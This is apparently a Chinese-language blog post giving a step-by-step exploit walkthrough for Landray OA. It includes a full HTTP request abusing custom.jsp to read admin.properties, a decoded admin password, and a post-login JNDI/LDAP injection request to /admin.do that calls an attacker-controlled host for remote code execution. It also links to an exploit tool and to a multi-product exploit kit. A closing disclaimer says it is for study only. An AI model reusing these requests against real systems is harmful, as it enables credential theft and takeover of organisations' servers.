蓝凌简介：蓝凌软件全称深圳市蓝凌软件股份有限公司，于2001年在深圳科技园成立。蓝凌是国内知名的大平台OA服务商和国内领先的知识管理解决方案提供商，是专业从事组织的知识化咨询、软件研发、实施、技术服务的国家级高新技术企业，近期Landray-OA系统被爆出存任意文件读取漏洞和后台rce

漏洞路径：

1.任意文件读取：

/sys/ui/extend/varkind/custom.jsp

漏洞验证：

burp抓包修改数据包

修改为post请求，路径如图

数据包

POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: 192.168.0.101:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Edg/95.0.1020.40
Accept: */*
Referer: http://192.168.0.101:8080/login.jsp;jsessionid=47794E4D4553DE56348578B560EA7BDD
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: JSESSIONID=47794E4D4553DE56348578B560EA7BDD
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 90

var=%7B%22body%22%3A%7B%22file%22%3A%22%2FWEB-INF%2FKmssConfig%2Fadmin.properties%22%7D%7D

 泄露password

 通过python脚本解出密码为：

asjt@123

登录成功

2.后台rce 

 下载利用工具

GitHub下载地址

在服务器开启漏洞利用工具进行监听

发送利用数据包

poc：

POST /admin.do HTTP/1.1
Host: 192.168.0.101:8080
Content-Length: 65
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Edg/95.0.1020.40
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://192.168.0.101:8080
Referer: http://192.168.0.101:8080/admin.do?method=config
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: JSESSIONID=47794E4D4553DE56348578B560EA7BDD
Connection: close

method=testDbConn&datasource=ldap://xxx.xxx.xxx.xxx:1389/xxxxx

成功命令执行

拓展：小伙伴们自己写了一个漏洞小工具，里面集成了个大oa，shiro，Stuts2等漏洞命令执行，供大家学习使用

下载地址

https://github.com/Liqunkit/LiqunKit_

特别声明：

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，我不为此承担任何责任。

作者有对此文章的修改和解释权。如欲转载或传播此文章，必须保证此文章的完整性，包括版权声明等全部内容。未经作者的允许，不得任意修改或者增减此文章内容，不得以任何方式将其用于商业目的。 切勿用于非法，仅供学习参考